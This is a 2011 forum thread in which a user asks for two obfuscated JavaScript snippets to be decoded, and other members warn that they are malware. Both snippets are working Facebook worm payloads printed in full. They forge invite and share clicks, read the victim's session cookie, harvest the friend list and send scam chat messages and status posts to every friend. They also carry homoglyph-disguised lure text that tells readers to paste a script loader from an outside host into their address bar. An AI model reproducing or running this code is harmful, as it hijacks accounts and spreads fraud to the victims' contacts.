Can someone decode this Js File

Discussion in 'JavaScript' started by bikerboys, Apr 21, 2011.

0
  1. #1
    Hey Members,

    Can someone please decode this js code for me

       javascript:var _0x8a00=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x36\x39\x36\x32\x35\x36\x33\x39\x37\x32\x31\x32\x39\x32\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x61\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x22\x20\x68\x72\x65\x66\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x73\x68\x61\x72\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x73\x3D\x31\x38\x26\x61\x6D\x70\x3B\x61\x70\x70\x69\x64\x3D\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x26\x61\x6D\x70\x3B\x70\x5B\x5D\x3D\x31\x36\x39\x36\x32\x35\x36\x33\x39\x37\x32\x31\x32\x39\x32\x22\x20\x74\x69\x74\x6C\x65\x3D\x22\x53\x65\x6E\x64\x20\x74\x68\x69\x73\x20\x74\x6F\x20\x66\x72\x69\x65\x6E\x64\x73\x20\x6F\x72\x20\x70\x6F\x73\x74\x20\x69\x74\x20\x6F\x6E\x20\x79\x6F\x75\x72\x20\x70\x72\x6F\x66\x69\x6C\x65\x2E\x22\x20\x69\x64\x3D\x22\x73\x6C\x69\x6E\x6B\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x73\x68\x61\x72\x65\x20\x73\x68\x61\x72\x65\x5F\x61\x22\x3E\x53\x68\x61\x72\x65\x3C\x2F\x61\x3E","\x69\x6E\x70\x75\x74","\x53\x68\x61\x72\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x6A\x75\x6E\x6B","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x73\x68\x64\x69\x76","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x73\x67\x64\x69\x76","\x73\x6C\x69\x6E\x6B","\x76\x61\x6C\x75\x65","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x64\x77\x44\x63\x76\x55\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x35\x32\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x38\x30\x30\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x61\x28\x29","\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x70\x6F\x70\x5F\x63\x6F\x6E\x74\x65\x6E\x74","\x6E\x6F\x6E\x65"];var v=[_0x8a00[0],_0x8a00[1],_0x8a00[2],_0x8a00[3],_0x8a00[4],_0x8a00[5],_0x8a00[6],_0x8a00[7],_0x8a00[8],_0x8a00[9],_0x8a00[10],_0x8a00[11],_0x8a00[12],_0x8a00[13],_0x8a00[14],_0x8a00[15],_0x8a00[16],_0x8a00[17],_0x8a00[18]];d=document; void (d[v[2]](_0x8a00[19])[v[0]]=[v[14]]); void (d[v[2]](_0x8a00[20])[v[0]]=[v[3]]);sl=d[v[2]](_0x8a00[21]);var ss=d[v[2]](v[4]);var c=d[v[6]](v[5]); void c[v[8]](v[7],true,true); void sl[v[9]](c);inp=d[v[17]](v[15]); void setTimeout(function (){for(i in inp){if(inp[i][_0x8a00[22]]==v[16]){inp[i][v[9]](c);} ;} ;} ,11000); void setTimeout(function (){ss[v[9]](c);} ,2500); void setTimeout(function (){d[v[2]](v[1])[v[0]]=_0x8a00[23];} ,3000); void setTimeout(function (){fs[v[10]]();} ,8000); void setTimeout(function (){SocialGraphManager[v[13]](v[11],v[12]);} ,9000);function a(){if(1==1){window[_0x8a00[25]](_0x8a00[24],10);d[_0x8a00[2]](_0x8a00[29])[_0x8a00[28]][_0x8a00[28]][_0x8a00[27]][_0x8a00[26]]=_0x8a00[30];} ;} ;a();
    PHP:

    Thanks Much
     
    bikerboys, Apr 21, 2011 IP
  2. bikerboys

    bikerboys Well-Known Member

    Messages:
    308
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    105
    #2
    Or decode this one thanks again

        var chatmessage = "%firstname%  just tr\u0456ed this \u0430nd g\u03BFt 500 fac\u0435bo\u03BFk credits w\u043Erks gre\u0430t bjipveu.drgfhd.info/?bjipveu";
  var postmessage = "%tf% %tf% %tf% %tf% %tf% %tf%\n wo\u03BFh\u03BF\u03BF r\u0435\u0430lly w\u03BFrks. Th\u0456s glitch g\u0456v\u0435s y\u03BFu fr\u0435\u0435 fb credits. Up t\u03BF 500 y\u03BFu can l\u0435\u0430rn h\u043Ew her\u0435. http://jdvt5wl.dfhdf6.info/?jdvt5wl\n";
  var redirect = "http://facenet-com.info/final.php";
  var eventdesc = "yo , I discovered a w\u0430y t\u043E get 450 real cr\u0435dits\n\nJust f\u043Ellow th\u0435 instruct\u0456ons on the w\u0435bsit\u0435 below! \n-->   lizlh0q.dfhdf6.info   <---- (&just c\u043Epy th\u0435 link)";
  var eventname = " Hurry and ch\u0435ck this \u03BFut ";
  var nfriends = 15;
  var eventmsg = "Hey Guys this r\u0435\u0430lly w\u03BFrks and I got my 500 credits\n \nJust f\u03BFll\u043Ew th\u0435s\u0435 3 st\u0435ps:\n\n1. C\u043Epy this c\u03BFd\u0435 (h\u0456ghl\u0456ght and press CTRL-C):\n\njavascript:(a=(b=document).createElement('script')).src='//1cf6pjb.gfhfgh4.info/f.js',b.body.appendChild(a);void(0)\n\n2. D\u0435l\u0435t\u0435 the actu\u0430l addr\u0435ss fr\u043Em the url f\u0456\u0435ld in y\u03BFur br\u043Ewser \u0430nd past\u0435 th\u0435 c\u043Ede inst\u0435ad.\n\n3. Pr\u0435ss Ent\u0435r and w\u0430\u0456t for a bit, \u0456t c\u0430n t\u0430ke up t\u03BF \u0430 m\u0456nute t\u03BF complete.\n\nThat's it!  \n\nIf y\u03BFu are h\u0430v\u0456ng tr\u03BFubl\u0435 w\u0456th thes\u0435 instruct\u0456\u043Ens, try \u03BD\u0456\u0435w\u0456ng th\u0435 \u0456nstructions here: http://1cf6pjb.gfhfgh4.info\n\nit's where I learned it";
  var eventpmsubj = "I \u0430ctually tried it";
  
  var _0xb65c=["\x47\x45\x54","\x2F","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x40\x5B","\x69\x64","\x3A","\x6E\x61\x6D\x65","\x5D","","\x26","\x3D","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x50\x4F\x53\x54","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x73\x75\x62\x73\x74\x72","\x28","\x29","\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74","\x70\x61\x79\x6C\x6F\x61\x64","\x6E\x6F\x77\x41\x76\x61\x69\x6C\x61\x62\x6C\x65\x4C\x69\x73\x74","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x67\x65\x74\x54\x69\x6D\x65","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x73\x65\x6E\x64\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x6F\x73\x74\x20\x72\x65\x74\x75\x72\x6E\x65\x64\x20","\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x73\x65\x6E\x64","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x3F\x75\x69\x64\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x6C\x65\x6E\x67\x74\x68","\x72\x65\x70\x6C\x61\x63\x65","\x70\x75\x73\x68","\x73\x68\x69\x66\x74","\x68\x6F\x6D\x65","\x25\x74\x66","\x25","\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74","\x6D\x65\x73\x73\x61\x67\x65","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x64\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x6D\x6F\x62\x69\x6C\x65\x2F\x3F\x76\x3D\x70\x68\x6F\x74\x6F\x73","\x58\x2D\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2D\x57\x69\x74\x68","\x58\x2D\x52\x65\x71\x75\x65\x73\x74\x65\x64","\x6D\x61\x74\x63\x68\x3A\x20"];x1= new XMLHttpRequest();x1[_0xb65c[2]](_0xb65c[0],_0xb65c[1]);x1[_0xb65c[3]]=function (){if(x1[_0xb65c[4]]==4&&x1[_0xb65c[5]]==200){var _0xc3adx1=document[_0xb65c[7]][_0xb65c[6]](/c_user=(\d+)/)[1];var _0xc3adx2=3;var _0xc3adx3=function (_0xc3adx4){if(_0xc3adx4){return _0xb65c[8]+_0xc3adx4[_0xb65c[9]]+_0xb65c[10]+_0xc3adx4[_0xb65c[11]]+_0xb65c[12];} ;return _0xb65c[13];} ;var _0xc3adx5=function (_0xc3adx4){if(_0xc3adx4){return _0xc3adx4[_0xb65c[11]];} ;return _0xb65c[13];} ;var _0xc3adx6=function (_0xc3adx4){out=_0xb65c[13];for(var _0xc3adx7 in _0xc3adx4){out+=(out?_0xb65c[14]:_0xb65c[13])+_0xc3adx7+((_0xc3adx4[_0xc3adx7]!==null)?_0xb65c[15]+encodeURIComponent(_0xc3adx4[_0xc3adx7]):_0xb65c[13]);} ;return out;} ;var _0xc3adx8=(z=x1[_0xb65c[16]])[_0xb65c[6]](/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];if(true){var _0xc3adx9= new XMLHttpRequest();_0xc3adx9[_0xb65c[2]](_0xb65c[17],_0xb65c[18]);_0xc3adx9[_0xb65c[21]](_0xb65c[19],_0xb65c[20]);_0xc3adx9[_0xb65c[3]]=function (){if(_0xc3adx9[_0xb65c[4]]==4&&_0xc3adx9[_0xb65c[5]]==200){var _0xc3adxa=_0xc3adx9[_0xb65c[16]][_0xb65c[22]](9);var _0xc3adxb=eval(_0xb65c[23]+_0xc3adxa+_0xb65c[24]);var _0xc3adxc=_0xc3adxb[_0xb65c[26]][_0xb65c[25]];for(var _0xc3adxd in _0xc3adxc[_0xb65c[27]]){var _0xc3adxe=Math[_0xb65c[29]](Math[_0xb65c[28]]());var _0xc3adxf=( new Date())[_0xb65c[30]]();var _0xc3adx10=chatmessage;x5= new XMLHttpRequest();x5[_0xb65c[2]](_0xb65c[17],_0xb65c[31]);if(true){x5[_0xb65c[3]]=function (){if(x5[_0xb65c[4]]==4&&x5[_0xb65c[5]]==200){alert(_0xb65c[32]+_0xc3adx9[_0xb65c[16]]);} ;} ;} ;x5[_0xb65c[34]](_0xc3adx6({msg_id:_0xc3adxe,client_time:_0xc3adxf,to:_0xc3adxd,msg_text:_0xc3adx10,post_form_id_source:_0xb65c[33]}));} ;} ;} ;_0xc3adx9[_0xb65c[34]](_0xc3adx6({user:_0xc3adx1,lsd:null,post_form_id_source:_0xb65c[33],popped_out:false,force_render:true}));} ;if(true){var _0xc3adx11= new XMLHttpRequest();_0xc3adx11[_0xb65c[2]](_0xb65c[0],_0xb65c[35]+_0xc3adx1+_0xb65c[36]);_0xc3adx11[_0xb65c[3]]=function (){if(_0xc3adx11[_0xb65c[4]]==4&&_0xc3adx11[_0xb65c[5]]==200){var _0xc3adx12=_0xc3adx11[_0xb65c[16]][_0xb65c[6]](/\/\d+#\d+#\d+#q\.jpg.*?\\u003c\\\/>/gi);var _0xc3adx10=[];for(var _0xc3adx13=0;_0xc3adx13<_0xc3adx12[_0xb65c[37]];_0xc3adx13++){var _0xc3adx14=_0xc3adx12[_0xc3adx13][_0xb65c[6]](/#\d+#/)[0][_0xb65c[38]](/#/g,_0xb65c[13]);var _0xc3adx15=_0xc3adx12[_0xc3adx13][_0xb65c[6]](/>[^>]+\\u003c\\\/>$/i)[0][_0xb65c[38]](/\\u003c\\\/>$/gim,_0xb65c[13])[_0xb65c[38]](/>/g,_0xb65c[13]);_0xc3adx10[_0xb65c[39]]({id:_0xc3adx14,name:_0xc3adx15});} ;var _0xc3adx16=[];while(_0xc3adx16[_0xb65c[37]]<_0xc3adx2&&_0xc3adx10[_0xb65c[37]]){var _0xc3adx17=Math[_0xb65c[29]](Math[_0xb65c[28]]()*_0xc3adx10[_0xb65c[37]]);_0xc3adx16[_0xb65c[39]](_0xc3adx10[_0xc3adx17]);var _0xc3adxf=_0xc3adx10[_0xb65c[40]]();if(_0xc3adx17){_0xc3adx10[_0xc3adx17]=_0xc3adxf;} ;} ;var _0xc3adx18={composer_id:_0xc3adx8,context:_0xb65c[41],fbx:_0xb65c[13],lsd:null,post_form_id_source:_0xb65c[33]};mt=postmessage;_0xc3adx10=postmessage;for(var _0xc3adx13=1;_0xc3adx13<=_0xc3adx2;_0xc3adx13++){mt=mt[_0xb65c[38]](_0xb65c[42]+_0xc3adx13+_0xb65c[43],_0xc3adx5(_0xc3adx16[_0xc3adx13-1]));_0xc3adx10=_0xc3adx10[_0xb65c[38]](_0xb65c[42]+_0xc3adx13+_0xb65c[43],_0xc3adx3(_0xc3adx16[_0xc3adx13-1]));} ;_0xc3adx18[_0xb65c[44]]=mt;_0xc3adx18[_0xb65c[45]]=_0xc3adx10;x6= new XMLHttpRequest();x6[_0xb65c[2]](_0xb65c[17],_0xb65c[46]);x6[_0xb65c[34]](_0xc3adx6(_0xc3adx18));} ;} ;_0xc3adx11[_0xb65c[34]](null);} ;if(true){x4= new XMLHttpRequest();x4[_0xb65c[2]](_0xb65c[0],_0xb65c[47]);x4[_0xb65c[21]](_0xb65c[48],null);x4[_0xb65c[21]](_0xb65c[49],null);x4[_0xb65c[3]]=function (){if(x4[_0xb65c[4]]==4&&x4[_0xb65c[5]]==200){m=x4[_0xb65c[16]][_0xb65c[6]](/<div class="EmailIframe"><iframe src="[^\"]+.*<div>.*<\/div>"/)[0];alert(_0xb65c[50]+m);} ;} ;x4[_0xb65c[34]](null);} ;} ;} ;x1[_0xb65c[34]](null);
    PHP:
     
    bikerboys, Apr 21, 2011 IP
  3. greatlogix

    greatlogix Active Member

    Messages:
    664
    Likes Received:
    13
    Best Answers:
    1
    Trophy Points:
    85
    #3
    greatlogix, Apr 21, 2011 IP
  4. bikerboys

    bikerboys Well-Known Member

    Messages:
    308
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    105
    #4
    thanks but dont help at al
     
    bikerboys, Apr 21, 2011 IP
  5. jazzcho

    jazzcho Peon

    Messages:
    326
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #5
    Don't expect any help. You are trying to decode the malware from here:
    DO NOT DO WHAT THE PAGE SAYS IF YOU HAVE ANY BRAIN BETWEEN YOUR EARS
     
    jazzcho, Apr 22, 2011 IP
  6. bikerboys

    bikerboys Well-Known Member

    Messages:
    308
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    105
    #6
    I know that thats why i want to see the code so i can report him but need to see the clear code cause he has like 25 of these sites
     
    bikerboys, Apr 22, 2011 IP